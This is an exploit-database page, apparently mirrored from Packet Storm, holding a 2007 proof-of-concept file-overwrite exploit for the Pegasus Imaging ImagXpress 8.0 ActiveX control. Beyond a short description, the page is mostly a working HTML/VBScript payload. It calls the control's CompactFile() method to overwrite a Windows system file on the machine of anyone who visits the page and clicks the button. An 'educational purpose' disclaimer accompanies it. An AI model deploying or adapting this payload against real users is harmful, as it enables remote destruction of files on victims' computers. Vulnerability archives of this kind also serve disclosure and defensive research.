Lucene search
K

pegasus-overwrite.txt

🗓️ 06 Oct 2007 00:00:00Reported by shinnaiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite on Windows X

Code
`<pre>  
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------  
<b>Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite</b>  
url: http://www.pegasusimaging.com/  
  
Author: shinnai  
mail: shinnai[at]autistici[dot]org  
site: http://shinnai.altervista.org  
  
<b><font color='red'>This was written for educational purpose. Use it at your own risk.  
Author will be not responsible for any damage.</font></b>  
  
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7  
  
<b>Description:  
Component name: PegasusImaging.ActiveX.ImagXpress8.dll  
Vesrion: 8.0.41.0  
This component contains an insecure "CompactFile()" which overwrites  
arbitrary files on user's pc.  
Passing to the first parameter (sourceFile) of the method an existing  
file as argument (e.g. a well known file as cmd.exe), the file passed  
as argument to the second parameter (destFile) will be overwrite.</b>  
-----------------------------------------------------------------------------  
<object classid='clsid:6277B638-833D-4315-9D78-60FC451DAF07' id='test'></object>  
  
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>  
  
<script language='vbscript'>  
Sub tryMe  
test.CompactFile "c:\windows\system32\cmd.exe", "c:\windows\system_.ini"  
MsgBox "Exploit completed."  
End Sub  
</script>  
</span></span>  
</code></pre>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation